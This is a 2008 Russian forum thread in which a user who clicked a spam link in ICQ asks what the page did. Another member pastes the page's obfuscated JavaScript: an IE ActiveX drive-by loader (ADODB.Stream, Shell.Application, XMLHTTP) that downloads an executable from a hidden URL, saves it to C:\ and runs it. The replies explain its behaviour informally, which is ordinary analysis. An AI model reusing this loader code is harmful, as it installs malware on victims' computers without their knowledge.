Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   лоханул в аське (https://forum.antichat.xyz/showthread.php?t=70212)

console done 13.05.2008 20:53
лоханул в аське
 
Думал друг кинул сообщение с ссылкой так как он мне писал и в этот же момент пришла мессага от спамбота , я не заметил. Но перед тем как нажать проверил онлайн докторомвебом мне ничего не выдало и нажал :((
Эта ссылка ( не нажимать , кто не в теме ) Там пустая страница и смайлик слева.

Может кто проверить , есть там что ? Стоит последняя лиса и za .

grishka 13.05.2008 20:57
смайл типа тебя поимели

Petr 13.05.2008 21:02
Просмотри хтмлку и скопируй сюда

geezer.code 13.05.2008 21:02
вот там што )))
Код:
function ZLFZz(){
try {
        var efds='';

  var aZxrwkh = document.createElement("obj"+efds+"e"+efds+"ct");
  aZxrwkh.setAttribute("id","a"+efds+"Zx"+efds+"rwkh");
aZxrwkh.setAttribute("class"+efds+"id","cls"+efds+"i"+efds+"d"+efds+":"+efds+"B"+efds+"D"+efds+"9"+efds+"6C5"+efds+"56-65A3"+efds+"-"+efds+"11D0-"+efds+"983"+efds+"A"+efds+"-"+efds+"00C"+efds+"04FC29E36");
var EkbSUoL = aZxrwkh.CreateObject("adodb"+efds+".stream",'');
var PEELt6 = aZxrwkh.CreateObject("S"+efds+"h"+efds+"el"+efds+"l"+efds+"."+efds+"A"+efds+"pplic"+efds+"ati"+efds+"on",'');
var dnigvr = aZxrwkh.CreateObject("msxml"+efds+"2"+efds+".X"+efds+"ML"+efds+"H"+efds+"T"+efds+"T"+efds+"P",'');
var jx89msS;
jx89msS=document.getElementById("sR28nH").innerText;

  dnigvr.open("G"+efds+"E"+efds+"T",jx89msS,false);
  dnigvr.send();
  EkbSUoL.type = 1;
  EkbSUoL.open();
EkbSUoL.Write(dnigvr.responseBody);
  Frogxa = "c:\\S87ekhV.exe";
EkbSUoL.SaveToFile(Frogxa,2);
eval("PEE"+efds+"Lt6.Shel"+efds+"lExec"+efds+"ute("+efds+"F"+efds+"rog"+efds+"xa);");
  }
  catch(e) {window.location="bof.php"};
  }
сплоент какой то ... через адодб

Petr 13.05.2008 21:05
Типо должен был у тебя бразуер подвиснуть :)

console done 13.05.2008 21:08
И всё :) ? Он внедрился в систему ? Его надо удалять?

geezer.code 13.05.2008 21:09
он качает какуюто заразу(dnigvr.open("G"+efds+"E"+efds+"T",jx8 9msS,false);)
потом сохраняет в корень С
и запускает.

отработал через эксплорер . про файрфокс не знаю.

Jailer 13.05.2008 21:11
Цитата:
Сообщение от console done
И всё :) ? Он внедрился в систему ? Его надо удалять?
аааа он внедрился к тебе! Мы все умрём!!!!!
=)))
на самом деле установи норм антивирь и он всё заблочит

console done 13.05.2008 21:12
Ахтунг. Что делать?

Exlibris 13.05.2008 21:12
Цитата:
var EkbSUoL
имена функций ппц =) какой то супер тарабарщ кодер ваял =))
--
Ну короче если не пострчно и не вникая во все эти стршные переменные, разобратся то сделалось слудующее:
Функция, в ней сздается элемент(и не один), который в совю очередь на паге фигачит злодеяния(непонятные из за имен переменных(сложно разобратся)), потом короче все это сзодеяние незаметно для тебя открывается, так же открывая с собой файл(похоу вир0с) и отсылая и сохраня его тебе..в самом конце на скрипт bof.php
--
Короче вир0с ты поймал 99%


Время: 20:02
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице